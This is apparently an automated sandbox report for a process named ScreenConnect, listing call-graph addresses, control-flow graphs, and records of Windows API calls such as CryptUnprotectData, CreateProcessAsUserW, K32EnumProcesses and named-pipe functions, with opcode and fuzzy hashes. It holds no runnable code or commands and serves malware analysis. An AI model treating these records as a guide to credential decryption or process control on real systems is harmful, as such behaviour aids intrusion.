39735 40f2970 39732->39735 39734->39714 39736 40f2996 39735->39736 39738 190fab8 3 API calls 39736->39738 39737 40f29a2 39738->39737 39781 5be60e8 39782 5be611c 39781->39782 39783 5be610c 39781->39783 39789 5be6268 39782->39789 39796 5be6257 39782->39796 39784 5be6115 39783->39784 39787 5be6268 4 API calls 39783->39787 39788 5be6257 4 API calls 39783->39788 39787->39783 39788->39783 39790 5be628d 39789->39790 39792 5be629d 39789->39792 39791 5be6296 39790->39791 39817 5be5688 39790->39817 39791->39783 39803 5be63e8 39792->39803 39810 5be63d7 39792->39810 39797 5be629d 39796->39797 39798 5be628d 39796->39798 39801 5be63e8 2 API calls 39797->39801 39802 5be63d7 2 API calls 39797->39802 39799 5be6296 39798->39799 39800 5be5688 ProcessIdToSessionId 39798->39800 39799->39783 39800->39798 39801->39798 39802->39798 39808 5be6412 39803->39808 39809 5be63ff 39803->39809 39804 5be6408 39804->39790 39805 5be657a K32EnumProcesses 39806 5be65b2 39805->39806 39806->39790 39808->39809 39820 5be5694 39808->39820 39809->39804 39809->39805 39815 5be6412 39810->39815 39816 5be63ff 39810->39816 39811 5be6408 39811->39790 39812 5be657a K32EnumProcesses 39813 5be65b2 39812->39813 39813->39790 39814 5be5694 K32EnumProcesses 39814->39815 39815->39814 39815->39816 39816->39811 39816->39812 39818 5be6620 ProcessIdToSessionId 39817->39818 39819 5be6693 39818->39819 39819->39790 39821 5be6528 K32EnumProcesses 39820->39821 39823 5be65b2 39821->39823 39823->39808 39683 40f5f28 39684 40f5f4c 39683->39684 39685 40f5f5c 39683->39685 39686 40f5f55 39684->39686 39689 40f64fd 3 API calls 39684->39689 39690 40f6558 3 API calls 39684->39690 39691 40f64fd 39685->39691 39697 40f6558 39685->39697 39689->39684 39690->39684 39693 40f653d 39691->39693 39692 40f6584 39692->39684 39694 40f657b 39693->39694 39695 190f930 3 API calls 39693->39695 39694->39692 39696 190f930 3 API calls 39694->39696 39695->39694 39696->39694 39698 40f658b 39697->39698 39700 40f657b 39697->39700 39701 190f930 3 API calls 39698->39701 39699 40f6584 39699->39684 39700->39699 39702 190f930 3 API calls 39700->39702 39701->39700 39702->39700 39739 583ee44 39740 583e869 39739->39740 39743 5be25f2 39740->39743 39750 5be25f0 39740->39750 39744 5be2638 39743->39744 39745 5be270e 39744->39745 39746 5be27be 39744->39746 39748 5be25f2 CryptUnprotectData 39744->39748 39749 5be25f0 CryptUnprotectData 39744->39749 39745->39746 39757 5be2f98 39745->39757 39746->39740 39748->39745 39749->39745 39751 5be2638 39750->39751 39752 5be270e 39751->39752 39753 5be27be 39751->39753 39755 5be25f2 CryptUnprotectData 39751->39755 39756 5be25f0 CryptUnprotectData 39751->39756 39752->39753 39754 5be2f98 CryptUnprotectData 39752->39754 39753->39740 39754->39753 39755->39752 39756->39752 39758 5be2f36 CryptUnprotectData 39757->39758 39760 5be2fa6 39757->39760 39759 5be2f62 39758->39759 39759->39746 39824 5831064 39826 5830bf8 39824->39826 39825 5831134 39825->39825 39826->39825 39827 40f66f0 3 API calls 39826->39827 39827->39826 39703 5832238 39704 5832280 WaitNamedPipeW 39703->39704 39705 583227a 39703->39705 39706 58322b4 39704->39706 39705->39704 39761 40f4cc0 39762 40f4cdc 39761->39762 39763 40f4cfa 39761->39763 39762->39763 39765 40f55c9 39762->39765 39766 40f55f7 39765->39766 39767 40f58ab 39766->39767 39770 40f7202 39766->39770 39774 40f7210 39766->39774 39772 40f7238 39770->39772 39771 40f72c7 39771->39767 39772->39771 39773 190fab8 3 API calls 39772->39773 39773->39772 39776 40f7238 39774->39776 39775 40f72c7 39775->39767 39776->39775 39777 190fab8 3 API calls 39776->39777 39777->39776

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 211 58304ec-58317f2 213 58317f4-58317f7 211->213 214 58317fa-583185f CreateNamedPipeW 211->214 213->214 216 5831861-5831867 214->216 217 5831868-5831889 214->217 216->217
                                                                                              APIs
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 0583184C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 2489174969-616035646
                                                                                              • Opcode ID: 6775d26818f709db77b20f72583c9cd257fbff5ff1a8a7c89d115e9822079a4d
                                                                                              • Instruction ID: 66c44b77ec74b0e116fd3cb89d609b3fe938c7e55909484eabce465dbcf89532
                                                                                              • Opcode Fuzzy Hash: 6775d26818f709db77b20f72583c9cd257fbff5ff1a8a7c89d115e9822079a4d
                                                                                              • Instruction Fuzzy Hash: FB3102B59013489FCB10CF9AD888A8EBFF5FF48314F14C069E919AB221C775A855CFA0
                                                                                              APIs
                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 058302BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcessUser
                                                                                              • String ID:
                                                                                              • API String ID: 2217836671-0
                                                                                              • Opcode ID: 3d35371f7129352df485284fdc64675768197498221b988e70fcdb1f7dc88bb4
                                                                                              • Instruction ID: f6417705ca6d42ad1a5b8d2a36d9083a1342fe1f0f6edd1249fd93a3cb5948f1
                                                                                              • Opcode Fuzzy Hash: 3d35371f7129352df485284fdc64675768197498221b988e70fcdb1f7dc88bb4
                                                                                              • Instruction Fuzzy Hash: F7412172900209DFCF11CFA9C884ADEBBF2FF48310F14842AE918A7250D775AA55CFA0
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: 3d34d93e049a66fff9d43c96bc517103dd43107986db6fe67de9479e5f11dcac
                                                                                              • Instruction ID: 090f9948a60872cc3f736d0ac7d059f8792ad533dd346bdf986a56ab3005ead8
                                                                                              • Opcode Fuzzy Hash: 3d34d93e049a66fff9d43c96bc517103dd43107986db6fe67de9479e5f11dcac
                                                                                              • Instruction Fuzzy Hash: 7421C2769042098FDF14DF94C4487EEBBF1EF88310F28846ED505A7291CB799945DBA1
                                                                                              APIs
                                                                                              • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 040F176E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3048884900.00000000040F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_40f0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataProtect
                                                                                              • String ID:
                                                                                              • API String ID: 3091777813-0
                                                                                              • Opcode ID: 9155fb59f12737f0158cfc10ff3e592840d8fab96361fca8b0197b619476dd7b
                                                                                              • Instruction ID: e10faad96a333b13889fb0b33384064b32e4c31a405d152868c8a82506c153a7
                                                                                              • Opcode Fuzzy Hash: 9155fb59f12737f0158cfc10ff3e592840d8fab96361fca8b0197b619476dd7b
                                                                                              • Instruction Fuzzy Hash: A12148B6800349DFCF10CF9AC844ADEBBF1FB88310F148429E919A7201C335A955DFA1
                                                                                              APIs
                                                                                              • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 040F176E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3048884900.00000000040F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_40f0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataProtect
                                                                                              • String ID:
                                                                                              • API String ID: 3091777813-0
                                                                                              • Opcode ID: dab4f3847f8266123625dfd4df84c524e4c3ff1a220657842d6757f8a2f3a953
                                                                                              • Instruction ID: c4b9aace00e736d6660d38c3c3603bf1671a7d8249ef84727a43634e9ab43175
                                                                                              • Opcode Fuzzy Hash: dab4f3847f8266123625dfd4df84c524e4c3ff1a220657842d6757f8a2f3a953
                                                                                              • Instruction Fuzzy Hash: 8C2148B6800349DFCB10CF9AC844ADEBBF5FB48310F148429E919B7610D375A955DFA1
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: ba5cfe51fb5fe17f24f397b1047eededab1ee7e9ac380fc531d065328b26df9a
                                                                                              • Instruction ID: c8f0f83835bdc3beed3b36fc44a87dfb6205d0effdd228862f08d5b8250af2f2
                                                                                              • Opcode Fuzzy Hash: ba5cfe51fb5fe17f24f397b1047eededab1ee7e9ac380fc531d065328b26df9a
                                                                                              • Instruction Fuzzy Hash: 6D2164B6800209DFCF10CF89C845BEEBBF9EB48320F148459EA19A7211C339A954DFA1
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: b5e25cc7dae0fc69a65c1db412cfa5f41c2f55ced6e8caa750a07ee957fbd4a6
                                                                                              • Instruction ID: 9c8c8a174e79cc2d741717714bcba5951830757aba8083997e65b1691664ed21
                                                                                              • Opcode Fuzzy Hash: b5e25cc7dae0fc69a65c1db412cfa5f41c2f55ced6e8caa750a07ee957fbd4a6
                                                                                              • Instruction Fuzzy Hash: 032167B6800249DFCF10CF99C844AEEBBF5FF48310F14845AE918A7211C339A555DFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 134 5831688-583170e 143 5831710-5831712 134->143 144 5831719-5831725 134->144 143->144 146 5831730-5831732 144->146 147 5831727-583172e 144->147 149 5831740-5831768 146->149 147->146 148 5831734-583173b 147->148 150 583179a-58317f2 148->150 151 583173d 148->151 153 5831771 149->153 154 583176a-583176f 149->154 159 58317f4-58317f7 150->159 160 58317fa-583185f CreateNamedPipeW 150->160 151->149 156 5831776-583178b call 58304ec 153->156 154->156 161 5831790-5831797 156->161 159->160 163 5831861-5831867 160->163 164 5831868-5831889 160->164 163->164
                                                                                              APIs
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 0583184C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID: 4L^q$d/dq
                                                                                              • API String ID: 2489174969-3455392024
                                                                                              • Opcode ID: 5b40098e2456cd7fd267aeaee63e07328ba914682de94e80db3bfc91c830e59b
                                                                                              • Instruction ID: 50dd5fafd5648c0f66b5ce5375889f352f5e3908ba91acd129e8df94eec8545e
                                                                                              • Opcode Fuzzy Hash: 5b40098e2456cd7fd267aeaee63e07328ba914682de94e80db3bfc91c830e59b
                                                                                              • Instruction Fuzzy Hash: F2619F71A003089FCB14DFA9C845BAEBFF6FF88710F14806AE909EB291D7759905CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 189 583f5d5-583f63c 191 583f690-583f713 CreateFileA 189->191 192 583f63e-583f663 189->192 201 583f715-583f71b 191->201 202 583f71c-583f75a 191->202 192->191 195 583f665-583f667 192->195 196 583f68a-583f68d 195->196 197 583f669-583f673 195->197 196->191 199 583f677-583f686 197->199 200 583f675 197->200 199->199 203 583f688 199->203 200->199 201->202 207 583f76a 202->207 208 583f75c-583f760 202->208 203->196 210 583f76b 207->210 208->207 209 583f762 208->209 209->207 210->210
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0583F6FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 823142352-616035646
                                                                                              • Opcode ID: 530a7395a9eefd14389134c74390f8d08f42f1885e35d4cd205c79ca3930e628
                                                                                              • Instruction ID: 79679da9cd7014036b1f696f4e6ca95d6e79fd5a91f4ad2e3510a21bc9fe65f7
                                                                                              • Opcode Fuzzy Hash: 530a7395a9eefd14389134c74390f8d08f42f1885e35d4cd205c79ca3930e628
                                                                                              • Instruction Fuzzy Hash: 515145B1D003499FDB10CFA9C945B9EBBF2FB48304F248129E908EB2A1D7799845CF91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 167 583da68-583f63c 169 583f690-583f713 CreateFileA 167->169 170 583f63e-583f663 167->170 179 583f715-583f71b 169->179 180 583f71c-583f75a 169->180 170->169 173 583f665-583f667 170->173 174 583f68a-583f68d 173->174 175 583f669-583f673 173->175 174->169 177 583f677-583f686 175->177 178 583f675 175->178 177->177 181 583f688 177->181 178->177 179->180 185 583f76a 180->185 186 583f75c-583f760 180->186 181->174 188 583f76b 185->188 186->185 187 583f762 186->187 187->185 188->188
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0583F6FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 823142352-616035646
                                                                                              • Opcode ID: b9db6725a558560a732e8de3bd144b8efe1f5f60c8eb6ea296f6219c8a9cf5e9
                                                                                              • Instruction ID: 17aebe0080f97488f9ad691bd7f390ce78fb7491fd59ba9cccb352a3dec0da48
                                                                                              • Opcode Fuzzy Hash: b9db6725a558560a732e8de3bd144b8efe1f5f60c8eb6ea296f6219c8a9cf5e9
                                                                                              • Instruction Fuzzy Hash: 2B5135B1D003499FDB10CFA9C946B9EBBF2FB48304F248129E908EB261D7799845CF91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 680 5be63e8-5be63fd 681 5be63ff-5be6402 680->681 682 5be6412-5be6419 680->682 683 5be64cc-5be64e0 681->683 684 5be6408-5be6411 681->684 685 5be641e-5be6462 call 5be5694 682->685 686 5be64a6-5be64af 683->686 687 5be64e2 683->687 703 5be6467-5be646c 685->703 690 5be650c-5be656e 686->690 691 5be64b1-5be64cb 686->691 688 5be64ee-5be64f7 687->688 694 5be657a-5be65b0 K32EnumProcesses 690->694 695 5be6570-5be6578 690->695 697 5be65b9-5be65e1 694->697 698 5be65b2-5be65b8 694->698 695->694 698->697 704 5be64f8-5be6505 703->704 705 5be6472-5be6475 703->705 704->690 706 5be6477-5be64a4 705->706 707 5be64e4-5be64e9 705->707 706->686 706->688 707->685
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: feeb3c100e367205b2dd9403508f67f49f1d59a31c5f30e701a882ccb0367581
                                                                                              • Instruction ID: aa23adde7c4cc9ae497e2ea28e09a24a02d4e571c2ce005637cbfaa6dc62ae53
                                                                                              • Opcode Fuzzy Hash: feeb3c100e367205b2dd9403508f67f49f1d59a31c5f30e701a882ccb0367581
                                                                                              • Instruction Fuzzy Hash: C1519F71A007058FCB24CF69D884AAEBBF5FF98310F14896ED46AD7641D734E9058BA1
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 39507c2e1fb5ad39204e74288ae88acd00fdd056ee0c5dde3abcb1c2a543483a
                                                                                              • Instruction ID: 4fbfaeb5249990096113dab9c895220990cb5a5fdb23f1180705c76a8758b6e8
                                                                                              • Opcode Fuzzy Hash: 39507c2e1fb5ad39204e74288ae88acd00fdd056ee0c5dde3abcb1c2a543483a
                                                                                              • Instruction Fuzzy Hash: E9312672C093998FDB11DFA9C8847DABFF1EF56214F09459EC498A7242D378A405CBA1
                                                                                              APIs
                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 058302BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcessUser
                                                                                              • String ID:
                                                                                              • API String ID: 2217836671-0
                                                                                              • Opcode ID: 9513021f7a85489f81f920080a5be38674d53843ffd573271b1ad0ca6fe865e8
                                                                                              • Instruction ID: 331d45716fd20afa9a267e7c4445d2de33ef5475f787f091159ac401392c742f
                                                                                              • Opcode Fuzzy Hash: 9513021f7a85489f81f920080a5be38674d53843ffd573271b1ad0ca6fe865e8
                                                                                              • Instruction Fuzzy Hash: 1A4110B6900249DFCF11CFA9C885ADEBBF2FF48310F14842AE918A7250D775AA55CF90
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 4035aa4dff4d7bef400e030329d0a89c8573c6e1fb41ea40ad04d6b617ec2ea4
                                                                                              • Instruction ID: 7de02e3511d7480663b108ef56abea0fff492943266ddd92bb6d6b9438de557f
                                                                                              • Opcode Fuzzy Hash: 4035aa4dff4d7bef400e030329d0a89c8573c6e1fb41ea40ad04d6b617ec2ea4
                                                                                              • Instruction Fuzzy Hash: 522134B2C002498FCB10CF9AC8447DEFBF4AB98320F15845AD469A3290D778A945CFA1
                                                                                              APIs
                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 05831EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: 1cbc83b566e60211303c5c17f0d974e26abf7c05ce455201d489e9baef75e979
                                                                                              • Instruction ID: fdb8f3c09153f8c4cfb71c08c196f90e180cdec440d18aa9195c159fcf537081
                                                                                              • Opcode Fuzzy Hash: 1cbc83b566e60211303c5c17f0d974e26abf7c05ce455201d489e9baef75e979
                                                                                              • Instruction Fuzzy Hash: 8A2135B0D10258DFCB14CFAAD489B9EBBF5BF48700F148469E819A7340CB75A945CFA4
                                                                                              APIs
                                                                                              • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05BE659D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumProcesses
                                                                                              • String ID:
                                                                                              • API String ID: 84517404-0
                                                                                              • Opcode ID: 771a3912b1f052af3555fac8ebe8bca95087ca4137aeb544bef133ffa5746c28
                                                                                              • Instruction ID: c6e0cb3915a75d77686ccbf7a1dd4ac7e2de964459c0856a7a83e6384fa5a75b
                                                                                              • Opcode Fuzzy Hash: 771a3912b1f052af3555fac8ebe8bca95087ca4137aeb544bef133ffa5746c28
                                                                                              • Instruction Fuzzy Hash: 182145B1D002099FDB10CF9AD885BEEFBF5FB48320F14846EE518A7240C338A905CBA4
                                                                                              APIs
                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 05831EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: 4a0e76f9c9d533b3c1c92780b07cd7496f5ccb64518892a306656107fe9a6eee
                                                                                              • Instruction ID: 6e396e2bd1315bf772cce9ea263d17a7dc4858a062135ab5c463b2ba389d2b7a
                                                                                              • Opcode Fuzzy Hash: 4a0e76f9c9d533b3c1c92780b07cd7496f5ccb64518892a306656107fe9a6eee
                                                                                              • Instruction Fuzzy Hash: 882126B0D00258DFCB14CF9AD489B9EFBF5AF48700F148469E849A7340DB759945CFA0
                                                                                              APIs
                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 0583229F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamedPipeWait
                                                                                              • String ID:
                                                                                              • API String ID: 3146367894-0
                                                                                              • Opcode ID: 7cf66838582d884e1204dd42830390aa8dfe22ccdd350999f58df33c7f334e01
                                                                                              • Instruction ID: 129157d50709901de06c08dd66965b06ffd9f2d192b40e8e06e1d1dcdc6a9d52
                                                                                              • Opcode Fuzzy Hash: 7cf66838582d884e1204dd42830390aa8dfe22ccdd350999f58df33c7f334e01
                                                                                              • Instruction Fuzzy Hash: 252115B68002498FCB10CF99C445AEEFBB5EB48314F14845DD859A7641C739A945CFA0
                                                                                              APIs
                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 0583229F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamedPipeWait
                                                                                              • String ID:
                                                                                              • API String ID: 3146367894-0
                                                                                              • Opcode ID: 7c4ee1e2f3ffa281895be4307006543226e2677ef27f53c2c71ce3935459091d
                                                                                              • Instruction ID: 54cebf2271fb07e7582958e35d41980aa70d51f4ee8e78cd15da06f0bfdb926e
                                                                                              • Opcode Fuzzy Hash: 7c4ee1e2f3ffa281895be4307006543226e2677ef27f53c2c71ce3935459091d
                                                                                              • Instruction Fuzzy Hash: 9121F4B68003498FCB14CF9AC845AEEFBF5FB88320F14846DD859A7641C779A945CFA1
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 2892744d003f6a9dc3fc79f445e80837156014ff222eec99e636242b85a18453
                                                                                              • Instruction ID: fc5f8326230bff0e2a649b2c0beb106bec8f764ab71986c1b913c2242a43555d
                                                                                              • Opcode Fuzzy Hash: 2892744d003f6a9dc3fc79f445e80837156014ff222eec99e636242b85a18453
                                                                                              • Instruction Fuzzy Hash: 061130B1C003499FCB10CF9AC844BEEFBF4EB88320F14846AD819A7240C378A944CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b56e6ebc1ec2f8334cff784074d937d8472605e20127ede2027679b2c0456547
                                                                                              • Instruction ID: c74c8f120dbaecb6ab00b13462cc5b8263227d14be4eda2d8adf8d5ab95c59a5
                                                                                              • Opcode Fuzzy Hash: b56e6ebc1ec2f8334cff784074d937d8472605e20127ede2027679b2c0456547
                                                                                              • Instruction Fuzzy Hash: B92137B6904244DFCB05DF14E9C0B26BF65FB98330F24C569E8090B256C336D816EBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                              • Instruction ID: 17a58cf731a0af5de3021be3665fa1c30c61681e388699f2a6c45e7af4a8208b
                                                                                              • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                              • Instruction Fuzzy Hash: BF11E676904280CFCB16CF10D9C4B16BF72FB98334F24C6A9D8090B256C336D85ADBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e11cf1fd0c55a081d269d4959372a31086b81ee37c3c3394499375f12265edc0
                                                                                              • Instruction ID: 4abc494886702d1527dd0aa5a87b718175aa72e68dd516468a5bb9f3f325c514
                                                                                              • Opcode Fuzzy Hash: e11cf1fd0c55a081d269d4959372a31086b81ee37c3c3394499375f12265edc0
